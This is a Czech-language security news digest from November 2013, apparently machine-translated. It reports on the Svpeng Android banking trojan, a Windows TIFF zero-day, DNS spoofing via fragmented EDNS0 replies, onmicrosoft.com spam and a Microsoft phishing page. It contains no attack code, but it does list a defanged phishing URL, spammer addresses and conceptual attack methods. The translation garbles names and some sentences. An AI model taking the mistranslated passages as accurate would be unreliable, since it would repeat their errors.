Android Banking Trojan Svpeng Goes phishingu
6.11.2013 Viry | Phishing
Bankovní Android Trojan známý jako Svpeng přidal phishing schopnosti svého arzenálu a výzkumníci našli to útočí ruské bankovní klienty v tom, co je vnímáno být běh na sucho, než je přizpůsoben i pro další země.
"Obvykle však zločinci první test spustit technologii na ruském sektoru na internetu a poté rozválejte na celém světě, napadat uživatele v jiných zemích," řekl výzkumník Kaspersky Lab Roman Unuchek na Securelist blogu dnes.
Unuchek řekl Trojan, který se šíří přes SMS spamu, má nový kód, který kontroluje jazykovou verzi operačního systému na počítači oběti, aby bylo možné přizpůsobit jeho zpráv ve správném jazyce. Pro tuto chvíli, malware se zdá být zájem v USA, němčině, běloruské a ukrajinské oběti.
Phishing je velká inovace pro Svpeng, také známý jako Trojan-SMS.AndroidOS.Svpeng. Android uživatelé v Rusku, kteří jsou infikováni budou prezentovány s phishing oknem po zahájení jejich bankovní aplikace. Okno žádá oběti uživatelského jména a hesla, která je pak odeslána do centrálního serveru, který patří k útočníkovi.
Unuchek také řekl, že Trojan se snaží ukrást bankovní kartě vrstvení phishing okna přes Google Play, když je to běh na uživatele mobilních zařízení. Okno vyzve uživatele k zadání jeho kreditní karty nebo bankovní karty informace včetně data expirace a CVC číslo, což je také dárkovém balení na útočníkův velení a řízení serveru.
Malware je také schopen vydávat příkazy k převodu peněz z účtu oběti na útočníka. Unuchek říkal, že to dělá tak, že posílání SMS zpráv na čísla patřící k dvojici ruských bank.
"Tímto způsobem se kontroluje, zda karty těchto bank jsou připojeny k počtu infikovaného telefonu dozvídá, rovnováhu a odešle ji ke škodlivému C & C serveru," Unuchek napsal. "Pokud je telefon připojen k bankovní kartou, může přijít příkazy od C & C převést peníze z uživatelského účtu na jeho / její mobilní účet nebo na bankovní účet kybernetických zločinců". Mezi zločinci pak může odeslat peníze do digitální peněženky a proplatit dovnitř "
Svpeng může brzy vypuknout za ruské hranice, Kaspersky vědci našli novou chování malwaru, zahájením úprav na základě umístění.
Unuchek řekl, že byli 50 úpravy Svpeng do tří měsíců malware byl sledovány. Útočníci jsou skálopevně přesvědčen o udržení Trojan aktivní, používá deviceAdmin Android nástroj, aby se zabránilo bezpečnostní produkty od odstranění. To také zabrání uživateli zakázat deviceAdmin nebo obnovení továrního nastavení využívá dosud neznámou chybu zabezpečení v systému Android Unuchek řekl.
Microsoft varuje před cílených útoků na Windows 0-Day
6.11.2013 Hacking | Počítačový útok | Zranitelnosti
Microsoft varuje uživatele o cílených útoků proti nové zranitelnosti v několika verzích Windows a Office, která by mohla útočníkovi umožnit převzít v počítači uživatele. Chyba, která ještě není oprava, je používán jako součást cílených útoků škodlivých e-mailových příloh, zejména na Středním východě av Asii.
V nepřítomnosti záplatou, Microsoft vydala fixit nástroj pro zranitelnosti, což zabraňuje zneužití proti zranitelnosti pracovat. Chyba ovlivňuje Windows Vista, Windows Server 2008 a Microsoft Office 2003 přes 2010.
"Exploit vyžaduje zásah uživatele, jako je útok se tváří jako e-mail žádající potenciálních cílů k otevření speciálně vytvořeného Word přílohu. Pokud je příloha otevření nebo náhledu, pokusí zneužít tuto chybu zabezpečení pomocí chybně grafiku vložené do dokumentu. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jaká má přihlášený uživatel "Microsoft poradní říká.
Tato chyba zabezpečení nemá vliv na aktuální verze systému Windows, uvedla firma, a uživatelé, kteří používají potenciálně ohrožené produkty, může trvat několik opatření, aby se ochránili. Instalace fixit nástroj pomůže zabránit vykořisťování, jak bude nasazení Enhanced Mitigation Experience Toolkit (EMET), který pomáhá zmírnit využije proti některým tříd chyb.
"Tato chyba zabezpečení je vzdálené spuštění kódu, který existuje ve způsobu, jakým postižené součásti zvládnout speciálně vytvořené obrazy TIFF. Útočník by mohl zneužít tuto chybu zabezpečení tím, že by uživatele přesvědčil k náhledu nebo otevření speciálně vytvořenou e-mailovou zprávu, otevřete speciálně vytvořený soubor, nebo procházet speciálně vytvořený webový obsah. Útočník, který by úspěšně zneužil tuto chybu zabezpečení, by mohl získat stejná uživatelská práva, jako aktuálního uživatele. Uživatelé, jejichž účty jsou konfigurovány tak, aby měli méně uživatelských práv v systému, by byli vystaveni menšímu riziku než uživatelé s uživatelskými právy správce <'Microsoft úředníků řekl.
Tržiště pro falešné následovníků Twitter je velký byznys
6.11.2013 Kriminalita
Nákup Twitter následovníci je běžná praxe pro politiků, celebrit, začínajícím, a dokonce i tzv. sociální média odborníci, kteří chtějí zvýšit své online Q skóre.
Takže to by nemělo být překvapením, že hackeři si všimli této příležitosti na trhu a budování impozantní podzemní podnikání automatizace vytváření a prodej, z falešné Twitter následovníků.
Falešná Twitter účty nejsou ničím novým, ale praxe je rafinovaný celou dobu. Spíše než aby se lidé, útočníci užíváte zavedené Twitter uživatele a duplikování své účty. Pravost falešných účtů je zásadní, aby tyto falešné účty žít a udržet Twitter schopnosti odhalování podvodů z odchyt a vypnutí účty.
"Kradou jména a připojením čísla nebo písmena vašeho jména, kopírování profilu fotografii, vaše bio, vaše umístění a začít posílat tweety ven," řekl Paul Judge , viceprezident a ředitel výzkumu v Barracuda Networks. "Kradou identity a dělat falešné účty, které umožňují jim lépe ladil a zdá důvěryhodnější. Vysílají tyto odkazy a někdo vidí jméno, vidí obraz, a domnívá se, že jsi to ty. Ukradli důvěru ve vás a vaše pověst zasláním odkazy. "
Barracuda udělal pozoruhodný výzkum na Twitter podzemí v minulosti, a soudce říká, že vývoj trhu je mimořádný, a to zejména poznamenat, že více než 60 procent nových falešných účtů jsou vytvořeny používáte taktiku kopírování legitimní existující účty a lepší míry prokliku na podezřelé odkazy, které vysílají.
"Existuje několik technik zpeněžení. Dělají vše, co od odkazy odesílání uživatelům lokalit Web využít výstroje odesílání odkazů na spam lokalit, affiliate reklamy, nebo pomocí stejných účtů prodat falešné následovníky, "řekl soudce. "Už diverzifikované příjmů. Vidíme stejný falešný účet používán pro všechny tři. "
Právě teď, Barracuda výzkum poukazuje na to, že je 52 eBay prodejce nabízení falešné Twitter následovníci v průměru o 11 dolarů na 1000 falešných účtů. To je překládat do více než 52.000 odběratelů pro každý subjekt kupuje falešné účty, Barracuda řekl.
"Jsou stále tak výhodné, aby mohli prodat tyto účty jako" Fake následovníků, "že vedlejším účinkem je, že jsou schopni vydělat peníze, aniž by to nutně poškozuje," řekl soudce. "Do určité míry je to s některými z jejich pozornost od šíření škodlivých odkazů."
Zatímco soudce řekl Barracuda nemá dobrou viditelnost na míru prokliku, dělají se údaj o ziskovosti z falešných účtů, které se používají k prodeji falešné následovníky.
"Když se podíváte na falešném účtu používaného prodat sám sebe jako stoupenec, jeden jednoduchý měřítkem toho, kolik podnikání jsou stále je to, kolik účtů, které sledují, to jsou jejich zákazníky," řekl soudce. "Jedna věc, kterou jsme schopni udělat pro každou armádu falešných účtů, jsme schopni se dívat na to, kolik lidí se sledujete, podívat se na počet unikátních lidí, které sledujete a posoudit úroveň podnikání, které "znovu mít. Pro některé z nich jsme mohli vidět v závislosti na výši, aby byly účtovány za následovníka, tyto podniky vytvářejí 20.000 dolarů 30.000 dolarů za měsíc na straně podniku jen prodávat falešné následovníky. "
Celá operace je automatizovaný, od kvality internetových stránek, které používáte (Easy Click-to-pay, hladké provedení) pro skriptování, které buduje armádu falešných následovníků.
"Od Twitter API poskytuje, je to tak jednoduché skripty interakcí s webové stránky Twitter, to je jedna z věcí, které dělaly to roste tak rychle," řekl soudce. "Jednoduchost, která se může stát členem a začít tweeting, to je bezbariérový, že je to tak snadné pro útočníkům využít toho ve srovnání s jinými sociálními sítěmi, které jsou složitější."
Soudce řekl, více než 90 procent tweety jsou automatizovány a odeslána prostřednictvím webové stránky Twitter, což je vlastně prozradí, že něco není v pořádku za předpokladu, že oprávněným uživatelům posílat většinu svých tweetů přes mobilní aplikace nebo třetí strany klientů.
"Podívejte se na ty falešné, je tu mnohem vyšší podíl na svých internetových stránkách Twitter, protože je to všechno napsaný," řekl soudce. "Jsme také schopni vidět různé záblesky během dne. Budete často vidět účtu, který nemá tweet celý den a pak viz zápis, kde jsou tweety a pak to zmizí po zbytek dne. "
Problémem pro podniky a spotřebitele, však je, že sociální sítě jsou často prvním měřítkem podniky nebo osoby pověst a důvěryhodnost. To je to, co dělá tuto takový atraktivní cestu pro hackery využít.
"Odpojení je, že průměrný člověk věci, které sociální média je měřítkem popularity, i když ve skutečnosti, všechno, co udělal, bylo utratit 11 dolarů za vaše followers.It je ekvivalentem nákupu Zagat recenze nebo pěti hvězdiček," řekla soudkyně . "Kupujete akreditaci."
NIST Aktivuje Recenze svého Crypto vývoj norem
6.11.2013 Šifrování
Národní institut pro standardy a technologie učinila důležitý krok směrem k opravě co Národní bezpečnostní agentura údajně porušeno zahajuje přezkum svých kryptografických procesů pro rozvoj norem .
NIST-podporované algoritmy jsou jádrem řady norem kryptografických používaných k zabezpečení komunikace a obchodu, stejně jako porce jako základ pro řadu komerčních softwarových produktů.
Odhalení z informátorů Edward Snowdena si posvítila na případné NSA podvracení některých běžně používaných šifrovacích algoritmů, a to nejen zpochybnění integrity technologií, ale poškození NIST postavu jako normalizačním subjektem zúčtování. Některé Snowden dokumenty, zejména set zveřejněna v září v New York Times řekl, že NSA byla ničena šifrovacích standardů buď záměrně oslabení algoritmu agentura pomáhali budovat, nebo vložením kódu backdoor, které by mohly poskytnout NSA přístup ke všem on-line komunikace si zvolí.
Matthew Scholl, zástupce náčelníka NIST počítačové divize bezpečnosti, řekl Threatpost že doufá, že výsledek přezkumu je validace a verifikace procesů NIST využívá k vytváření kryptografických standardů, přirovnává ji k zajištění kvality a kontroly kvality. Dodal, že tento typ hodnocení není bloudit příliš daleko od zavedených hodnocení NIST svých procesů, ale tohle bude pravděpodobně o něco více veřejných. NIST uvedla, že bude získávat zpětnou vazbu při přezkumu z akademické obce crypto jiné normy, orgány, vlády a mezinárodními partnery, jakož i průmyslovými partnery.
"Škoda je široká a hluboká, a to nejen na NIST, ale pro průmysl a vlády jako celku," řekl Scholl. "Snažíme se, abychom zajistili udržení důvěry a udržet aktivní účast externích komunit crypto v naší práci. Chceme zajistit, budeme udržovat důvěru v to, co děláme, a nadále si, že účast-které dostaneme, když máme důvěru. "
K úniku vyjmenovat hlubiny dohledu NSA a vystavovat podvracení kryptografické standardy zvýšil skepsi nad NSA-sponzorované kryptografii. Nejvíce high-profil infiltrace může být vložení backdoor kódu v Dual ES DRBG algoritmu , v září, NIST doporučuje, aby vývojáři již použít algoritmus , dokud přezkoumání byla dokončena. RSA Security následoval s podobným doporučením. Dual ES DRBG je výchozí generátor náhodných čísel v řadě výrobků, včetně RSA RSA BSAFE knihoven a RSA softwaru pro správu.
NIST uvedla, že je znepokojena úniky NSA, protože to ohrožuje integritu jeho úsilí.
"Usilujeme o trvale otevřené a transparentní proces, který požádá o celosvětovou komunitu kryptografie, což nám pomáhá rozvíjet a vet algoritmy do naší kryptografických vedení," říká Donna Dodson, šéf bezpečnosti počítače NIST divize. "NIST se snaží podpořit důvěru v naše kryptografického vedení prostřednictvím těchto souhrnných a transparentních procesů rozvoje, kterým věříme a které jsou nejlepší v provozu."
Prominentní crypto experti, jako Matthew Green Johns Hopkins univerzity řekl Threatpost v září po zveřejnění výbušné New York Times článek o krypto činnosti NSA: "Spojené státy měly obrovský vliv na crypto po celém světě, protože máme NIST," Green řekl. "Mohli jste vidět lidi vytrhnout z NIST, který by poškodil všechny, a přestěhovat se do regionálních norem. Ta věc je problém.
"Věříme NIST, protože tam je spousta chytrých lidí. Pokud jste se rozešli do regionů, je to možné, co mohl dostat méně bezpečná, "Green přidán. "Ty by mohly skončit s více zranitelných míst standardy dostat slabší, tím méně úsilí, které vložíte do něj."
NIST řekl, že recenze je v počátcích a že se podílejí odborníci stále sestavování cílů, určit, které algoritmy budou přezkoumány a jak budou přezkoumány.
Po dokončení budeme veřejnému připomínkování v tomto procesu, "řekl Dodson. "Máme také přinese nezávislou organizací provést formální přezkoumání naší tvorby norem přístupu a navrhnout zlepšení. Na základě připomínek veřejnosti a nezávislý přezkum, budeme aktualizovat náš postup podle potřeby, aby se ujistil, že splňuje naše cíle pro otevřenost a transparentnost, a vede k nejvíce bezpečné, důvěryhodné vedení proveditelné. "
DOE kontrola odhalí nové slabiny a neopravených Starší nedostatky
6.11.2013 Zranitelnosti
Audit ministerstva energetiky ukázaly, že 29 nových nedostatky se objevily na agentury sítí letos kromě 10 stávající, že ministerstvo životního prostředí se nepodařilo opravit po 2012 auditu.
Audit provádí Úřad generálního inspektora a Úřadu auditů a kontrol, odhalil nedostatky v podávání zpráv o bezpečnostních, řízení přístupu, patch management integrita systému, konfigurační management, oddělení neslučitelných funkcí, a řízení bezpečnosti u 11 z 26 zařízení DOL je . Auditorská zpráva neuvádí konkrétní místa nebo identifikovat konkrétní chyby.
Bylo zjištěno 11 nedostatků řízení přístupu rozděleny mezi osm zařízení. Mezi přestupky v těchto místech včetně podprůměrné správu uživatelských přístupových oprávnění, nevhodné poskytnutí fyzického přístupu k citlivým zařízením, neschopnost realizovat multifaktoriální ověření pro vzdálený přístup a široké nasazení prodlení nebo snadno odhalitelný přihlásit v pověření na serverech nebo síťových služeb .
Na pěti místech, auditoři zjistili, že správci systémů dělali špatnou práci provádí software, aplikace a operační systémy, patche, takže oddělení strojů vystaveny desítky známých vulnerabilites. Audit zprávě se uvádí, že se jedná o druhy nedostatků, které dal útočníkům schopnost ukrást vaše osobní identifikační údaje o více než 100 tisíc osob uložených v těchto systémech letos v létě.
Šest míst sídlí stroje s nesprávně provedena, webových aplikací, z nichž některé obsažené špatně koncipované ověření a uživatelsky ověření funkce v systémech, které podporují finanční řízení a jiných citlivých funkcí.
Auditoři identifikoval pět různých nedostatků správy konfigurace na třech různých místech. IT týmy na těchto místech nerozvinula zásady organizace správy konfigurace nedostatečně uplatněny, konfigurační postupy pro kontrolu změn a nedostatečně správu aplikačních postupů řízení změn.
Na jednom místě, audit ukázal, že zaměstnanec ani role byly jasně definovány, ani pravidelně sledováni.
Poslední slabost uvedené v auditu se vztahuje na správnou bezpečnostní školení pro zaměstnance, ne všichni z nich dokončil bezpečnostní školení. Oni také nenahlásil počítačové bezpečnostní incidenty, udržuje pracoviště systémové seznam takovýchto událostí a pravidelně přezkoumává záznamy popisující tyto události.
Za těchto oddělení také nevystavila zprávy o bezpečnostních informací z více než 450 systémů, dodavatel-obsluhoval, které se ve zprávě tvrdí, jsou tytéž systémy, které obsahovaly většinu chyb uvedených v tomto a bývalý auditů.
Generální inspektor kancelář se trestního vyšetřování července 2013 útok, který odhalil PII stovek tisíců jednotlivců. Výsledky tohoto šetření budou zveřejněny v samostatné zprávě na pozdější dobu.
Zpráva vydaná následující doporučení DoE zaměstnanců: nápravě nedostatků zjištěných při provádění příslušných kontrol. Ujistěte se, že zásady a postupy jsou vyvíjeny, podle potřeby, a jsou realizovány v souladu s federálními a obchodních požadavků na dostatečně bezpečných systémů a aplikací. Ujistěte se, že účinné postupy pro monitorování výkonnosti jsou implementovány odhadnout celkový výkon pro ochranu přírodních zdrojů informačních technologií. Plně rozvinout a využít plány akcí a dílčích cílů na priority a sledovat nápravu všech bezpečnostních nedostatků počítačové vyžadují nápravná opatření. A zajistit, aby oddělení obsahuje informace pro oba federální a dodavatel systémů při hlášení stavu metriky plnění každoročně ministerstvo vnitřní bezpečnosti.
DOE řízení obdržel zprávu, z velké části souhlasí s jeho zjištěními, a zavázala k nápravě nedostatků zjištěných v něm.
Můžete si přečíst celou zprávu zde [PDF].
Microsoft Změny Bug Bounty programu včetně Incident respondenti, Forenzní specialisté
6.11.2013 Incidenty
Poté, co našel nějaký počáteční úspěch se svou první vpád do světa bug bounty, Microsoft rozšiřuje program otevřít platby až do výše 100.000 dolarů týmy incidentů a forenzní odborníci, kteří přicházejí přes aktivní útoky ve volné přírodě, které obsahují nové techniky, které obcházejí využít ke zmírnění dopadů na místě na nejnovější verzi systému Windows.
Změna je navržena tak, aby rozšířila oblast lidí, kteří mohou předložit nové útočné techniky společnosti Microsoft, a proto pomáhá firma dále zabezpečit Windows. Za účelem získání nového programu, organizace nebo jednotliví přispěvatelé třeba předem registrovat u společnosti Microsoft zasláním e-mailu na DOA [at] microsoft [dot] com a poté předloží i odbornou analýzu nové techniky, stejně jako důkaz -of-concept kód. Katie Moussouris, senior stratég zabezpečení společnosti Microsoft, řekl, že nový přírůstek do nájemný programu také by měl umožnit organizacím, které se staly oběťmi útoků škodlivého softwaru, aby předložila příspěvků.
"Důvod, proč jsme se ptáte na proof-of-concept kód, který mnoho lidí může být netají vlastních vzorků malwaru, protože tam může být identifikační údaje tam," řekla. "Jsme zájem o techniku. Chtějí-li nám poslat vzorek, to je taky v pohodě. Nechceme vidět hodně nových útočných technik, protože jsou opravdu vzácné. "
Chyba Microsoft Bounty Program se liší od programů, většina prodejců, zatímco to vyplatí ne pro jednotlivé zranitelnosti, ale pro nový útok a obranné techniky. Společnost uhradila první 100000dolar odměnu v říjnu výzkumníka James Forshaw, který objevil novou techniku pro obcházení systému Windows exploit snižující závažnost rizika. Moussouris řekl přidání týmů incidentů a forenzní specialisté byli v pracích na nějakou dobu, ale společnost chtěla počkat oznámit, že až poté, co někdo získal odměnu.
Ale je tu i další motiv pro nové odměnu: pustoší zranitelnosti trhu.
"Jsme záměrně dělá to narušit stávající zranitelnost a využívat tržiště," řekl Moussouris. "Černý trh platí mnohem vyšší ceny, ale část z toho, co platíte, je exkluzivita a spoléhání na techniku pobytu v tajnosti tak dlouho, jak je to možné. Chci, aby to bylo podnětem pro lidi vyhodit těchto operačních programů. "
Cílem je snížit množství času, že nová technika je užitečná pro útočníky, Moussouris řekl. A to není konec změn nájemný programu, a to buď.
"Mám i jiné věci do rukávu," řekl Moussouris.
Apple Zapíná útok BEAST Safari zmírnění ve výchozím nastavení v OS X Mavericks
6.11.2013 Počítačový útok | OS | Zabezpečení
Apple umožnil funkci ve svém nedávném OS X Mavericks aktualizaci kastrované na útoky BEAST kryptografické . BEAST je dva-rok-starý útok nástroj, který zneužívá chybu zabezpečení v protokolu TLS 1.0 a SSL 3.0 a může vést k útočníkovi krást cookies, HTTPS nebo únos prohlížeče sezení.
Apple prohlížeč Safari byl osamocený protahování mezi hlavními prohlížeči povolit implicitně 1/n-1 rozdělení, které by zmírnily útoky, další přední prohlížeče obrátil ji ve výchozím nastavení od začátku roku 2012. Kód mezitím působí od předchozího OS X Lion Mountain verzi ale nebyl zapnutý, dokud OS X 10.9 Mavericks.
Rozdělení 1/1-n technika zastaví útočníkům být schopni odhadnout, které bloky inicializační vektor bude použita k zamaskování holého data před jejich jsou zakódovány. Ivan Ristic, ředitel aplikačního výzkumu na Qualys, řekl Threatpost v září, že man-in-the-middle útok by usnadnilo schopnost předvídat tyto bloky a vliv, co jsou zakódovány. Vzdělaný Útočník s dostatkem odhady pravděpodobně přistane na správném bloku Ristic řekl.
On zapsal blogpost v době, kdy BEAST útok by pomohla získat malé datové fragmenty, které by dal útočník nějaké pokyny.
"To nemusí znít velmi užitečné, ale máme mnoho velmi cenné fragmenty celé: HTTP session cookies, přihlašovací údaje (mnoho protokolů, nejen HTTP), založené na adrese URL relace známky, a tak dále," řekl Ristic. "Proto, BEAST je vážný problém."
S vydáním Mavericks však Ristic řekl, v první chvíli si nemyslel, že rozdělení 1/1-n byl ve výchozím nastavení povolena. Safari jsem TLS podporují 1,2, což Ristic označil za důležitý update, ale to samo o sobě ani zmírnit bestie útoků, protože se zaměřili na TLS 1.0 a dřívějších protokolů.
"Klient-side podpora TLS 1.2 v současné době není dostačující, protože (1) jen asi 20 procent serverů podporu této verze protokolu a (2), všechny hlavní prohlížeče jsou náchylné k útokům protokolu downgrade, které mohou být prováděny aktivní MITM útočníci, "řekl psal minulý týden.
Ristic udělal trochu lov a kopání mimo poznámkách vydání aktualizace zabezpečení pro individualisty a podíval se na některé z Apple Zdrojový kód je uvolněn jako open source a zjistil, že rozdělení 1/1-n byla skutečně zapnutý.
"Díky tomu můžeme konečně konstatovat, že bestie dostatečně zmírněny na straně klienta, a jít dál," řekl Ristic.
BEAST nástroj byl propuštěn v září 2011 výzkumníky Juliano Rizzo a thajské Duong na Ekoparty konferenci. Útočník pomocí BEAST mohl dešifrovat TLS 1.0 a SSL 3.0 relace na mouchy a do žádného šifrované relace, čímž on-line bankovnictví, nebo e-commerce transakcí v ohrožení.
BEAST ohýbá jeho svaly konkrétně proti algoritmu AES šifrování, které se postaví TLS / SSL. Jakmile man-in-the-middle pozice je založena a oběť surfuje na jejich bankovní stránek, dřevo-in a obdrží cookie by BEAST kód poté aplikovat do prohlížeče přes iFrame nebo nakládací BEAST javascript do prohlížeče. Malware pak čichá síťový provoz hledají připojení TLS a je schopen dešifrovat HTTPS cookie, v podstatě zotavuje verzi holého textu údajů a dává útočníkovi dálkový ovladač v aktuální relaci.
Rizzo a Duong řekl, že BEAST využívá zranitelnost sahá až do první inkarnaci SSL, bug, který byl do značné míry považován za non-zneužitelné.
BEAST útoky jsou ideální pro použití v cílených útoků proti konkrétním osobám, protože útočníci by musela být v man-in-the-middle pozici, BEAST nelze provést na jakémkoliv měřítku, Ristic řekl. Také byl zdrojový kód pro BEAST nikdy propuštěn Rizzo a Duong.
Kompaktní firewally pro datová centra má Fortinet
06.11.2013 Zabezpečení | Ochrana
FortiGate-3700D, kompaktní síťové firewally pro datová centra, velké poskytovatele služeb, provozovatele cloudů a operátory začal nabízet Fortinet.
Novinka obsahuje čtyři 40GbE (QSFP+) porty a 28 portů 10GbE (SFP+) a umožňuje na firewallu dosáhnout propustnosti až 160 gigabitů za sekundu. Díky speciálnímu procesoru NP6 ASIC nabízí nízkou latenci i paritu mezi IPv4 a IPv6.
Podle výrobce jde o první kompaktní zařízení, jež poskytuje kapacitu přes 100 Gb/s a čtyřicet GbE portů.
FortiGate 3700D využívá Forti OS 5, síťový bezpečnostní operační systém, jenž tvoří základ všech síťových bezpečnostních platforem FortiGate.
FortiOS 5 nabízí flexibilní modely nasazení v rámci datového centra jako je třeba firewall v jádru, kde poskytuje výkonný firewall s ultrakrátkou odezvou, nebo jako firewall na periferii, který může být použitý interním či externím komunitám s různým stupněm důvěryhodnosti za použití různých profilů včetně kombinací firewall a VPN, firewall a IPS, NGFW (Next Generation Firewall), pokročilá ochrana před hrozbami apod.
Uplatnění najde FortiOS v infrastruktuře malých i velkých organizací stejně jako v celé řadě dedikovaných bezpečnostních zařízení.
Nové triky, které mohou přinést DNS spoofing zpět, nebo: "Proč by měl umožnit DNSSEC i když je bolest dělat"
05.11.2013 Počítačový útok | Hacking
V poslední době, dva dokumenty independently nastínil nové útoky proti DNS, což podkopává některé z bezpečnostních prvků chránících nás falšování DNS.
Jak Dan Kaminsky ukázal [1], 16 bit ID dotazu jsou nedostatečná ochrana proti podvržení DNS. Jako výsledek, DNS servery začal náhodně zdrojový port DNS dotazů, aby DNS spoofing těžší. To nikdy neměla "opravit" DNS spoofing, ale fungoval dobře dost pro DNSSEC musí být odsunuto znovu.
Celkově se úspěšně spoof DNS, musí útočník překonat různé problémy:
odpovědět dříve, než přijde odpověď platí: To lze snadno provést začíná povodňových odpovědí ještě předtím, než byl poslán dotaz.
Hádej Query DNS ID a zdrojový port dotazu: V současné době je tento problém považován za hlavní kámen úrazu.
Jakmile je platný dotaz přijde, je útočník "uzamčen" z pokusu další pokus o falšování, dokud TTL záznamu vyprší (Dan Kaminsky ukázaly, jak to lze překonat tím, že žádá o neexistující záznamy)
Mezi další útoky používáte dvě modernější DNS vlastnosti:
Odpovědět Omezení rychlosti (RRL)
DNS spoofing není jediný problém DNS musíme bránit. DNS servery mohou být zneužity jako reflektory v odmítnutí útoků služby (DoS). I když DNS server je pouze zodpovídání dotazů, pro které je autoritativní, může ještě být zneužit tím, že žádá pro záznamy, pro které je směrodatné pro. Moderní DNS servery (např. BIND 9), kterou funkci pro omezení, kolik odpovědí DNS server bude odesílat. Pokud je dosaženo limitu, server DNS buď nereagují vůbec, nebo odpovědět s prázdným zkrácený odpověď. Prázdný zkrácen odpověď bude nutit zdroj dotazu vrátit přes TCP. Pokud dotaz spoofed, pak se to nestane. BIND ve výchozím nastavení přeskočí každý druhý odpověď v tomto scénáři.
Problém arrises pokud útočník zaplaví autoritativní DNS server, aby mu zabránil odeslání odpovědi. To poskytne více času posílat podvržené odpovědi zpět. Výzkumníci ukázali, že to může vést k podvržení DNS. Ale to vyžaduje hodně paketů (100 Mbit za 8 hodin), aby byla úspěšná jako Query ID a zdrojový port potřebuje být brute vynutit. [2]
Na obranu proti tomuto útoku, při zachování RRL, stačí upravit skluzu hodnotu, která určuje, jak často DNS server bude přeskakovat odpověď DNS, zatímco v nouzi. Skluzu hodnota "1" nevynechá žádné odpovědi.
Roztříštěné EDNS0 odpovědi
Původně byly DNS odpovědi omezena na 512 bajtů, aby se zabránilo fragmentaci. Jakékoliv větší reakce musela být požadováno přes TCP. Nicméně, TCP vyžaduje značné vyšší zatížení a dotaz musí být odeslána dvakrát. Moderní DNS tendenci používat větší odpovědi s IPv6 a DNSSEC záznamů, jakož i využívání DNS pro vyrovnávání zatížení. V reakci na to byl představen nový systém, který EDNS0,. Pokud je povoleno, může server DNS signalizovat maximální odezvy velikost, která je větší než 512 bajtů. Typická hodnota je 4096 bajtů. V důsledku toho, jsou tyto reakce často roztříštěné.
Je-li odpověď roztříštěné, všechny hodnoty použité pro "ověření" odpověď je v prvním fragmentu (dotaz id a UDP porty). Nyní je možné, aby útočník spoof další fragmenty. Všechny útočník uhodnout je fragment offset a fragment ID. Offset fragment je možné odhadnout, že za předpokladu, MTU je 1500 bajtů (nebo může být odvozeno z MSS-li paket TCP ze serveru DNS obdrží útočníkem). Fragment ID (nebo IP ID) je často zvýšen z paketu paket, takže jej lze snadno uhodnout. Je-li náhodné, je stále jen 16 bitů dlouhá. [3]
Neexistuje žádný slušný obranou proti útoku dosud. Zakázání EDNS0 může fungovat, ale bude to vést k problémům s DNSSEC, která vyžaduje EDNS0. Váš operační systém může umožnit náhodně dotazu ID a to by pravděpodobně minimální ochrana pro teď.
DNSSEC samozřejmě zůstává jedinou skutečnou ochranou proti těmto útokům.
[1] http://dankaminsky.com/2008/07/24/details/
[2]
http://u.cs.biu.ac.il/ ~ herzbea/security/13-03-frag.pdf
Nový spam technika - onmicrosoft.com
05.11.2013 Spam
Spammeři již dlouho spoléhali na boty, kompromitaci webmail účty nebo otevřené SMTP relé posílat zbabělý náklad našich schránek. Tento nový trend je variace na téma. Spammer nastaví marnost doménu a klepněte na rozesílání spamu přes něj. Zajímavé je, že bit není hotmail.com nebo outlook.com ale onmicrosoft.com používá. Formát je následující:. <username> @ <Vanity-name> Onmic rosoft.com. Jeden čtenář Melvin zažil poměrně málo z nich a zeptal se mě psát to. Abych citoval Melvin "Tak, spammeři registraci * S * Microsoft pro domény hosting a web-hosting a pak zneužívat Microsoft vlastní e-mail servery (" six-nines-availability/reliability ") k distribuci jejich spam / podvod zprávy." <sarcasm> Skvělé obchodní plán! </ Sarkasmus>
Je vaše IDS / IPS, anti-spam, nebo e-mailové brány umožňuje to přes upozorňování na ně, nebo jejich blokování?
Zde jsou některé ukázky:
Datum: St. 16.října 2013 20:49:20 +0100
Subject: (none)
Od: Uk Národní < 001@tanlan.onmicrosoft.com >
Reply-To: < claimsagent845@yahoo.com.hk > Váš e-mail Id vyhráli 1,000,000.00 GBP v britské Národní loterie ... ______________ Datum: Po. 7 října 2013 20:13:23 +0530 Subject: Barclay BANK Od: BARCLAY'SBANK < pp7@lines.onmicrosoft.com > Reply-To: < barclaysbnnkplclondon @ elán . vn
>
______________ Datum: Pá. 04.10.2013 16:23:48 +0000 Subject: Nechte chvíli trvat tak tolik, kolik chcete. From: < . JackChappell @ morriswatanabe onmicrosoft.com > ______________ Datum: Út. 01.10.2013 18:22 : 23 0100 Předmět: Kontakt: Toto je můj druhý e-mail, prosím odpovězte Od: Ahmed Mohamed < Ahmed01 @ lawoffice2013. onmicrosoft.com > Reply-To: < askahmedmhd@yahoo.co.uk > ______________ Datum: So. 28.září 2013 21:35:33 +0530 Subject: Potřebujete obchodní nebo osobní půjčku Od: Půjčka Nabídka < LOAN21110011 @ Changloan656. onmicrosoft.com > Reply-To: < loanoff00@hotmail.com > ______________ Datum: čt. 26 září 2013 22 : 19:47 +0000 Subject: Exkluzivní nabídka, cítím to v reálném From: < GiuseppeArena @ wabipyge. onmicrosoft.com > ______________ Datum: So. 21.září 2013 04:20:00 +0530 Subject: Kontaktovat FedEx kurýrní službou PRO VAŠI FONDU CONSIGNMENT BOX Od: < . 019@Burrows00t.onmicrosoft com > Reply-To: < donphilip011@gmail.com > ______________ Datum: St. 18.září 2013 07:17:50 +0000 Subject: Jedinečný produkt pro vaše potřeby Od: < MichaelAshcroft . @ wabipyge onmicrosoft.com > ______________ Datum: Po. 16.září 2013 17:58:25 +0530 Subject: Re From: "Slečna Zaina Abisali" < 3@emailer.onmicrosoft.com > Reply-To: < miss.zainaabisali @ gmail.com > ______________ Datum: pá. 04.10.2013 16:23:48 +0000 Subject:. Nechte chvíli trvat tak tolik, kolik chcete From: < . JackChappell @ morriswatanabe onmicrosoft.com >
Buďme opatrní, tam venku!
Microsoft phish
05.11.2013 Phishing
Jaké štěstí! Seznam manipulátory právě obdržel opravdu dobře Phish. Žádné trapné gramatika, žádné překlepy. Adresa URL odkazuje na následující odkaz
hxxp :/ / innovativeair.org / wp-info / microsoft / index.htm
Z formátu, se zdá být ohrožena WordPress stránky. Jak již bylo hlášeno na anti-phishing skupin a postavena v roce phishingu a malwaru ve Firefoxu detekuje stránku jako phishing. Jediná věc, která je neobvyklé je, jak dobře udělal je e-mail, a že to obejít anti-spam filtr přijet do mé schránky.
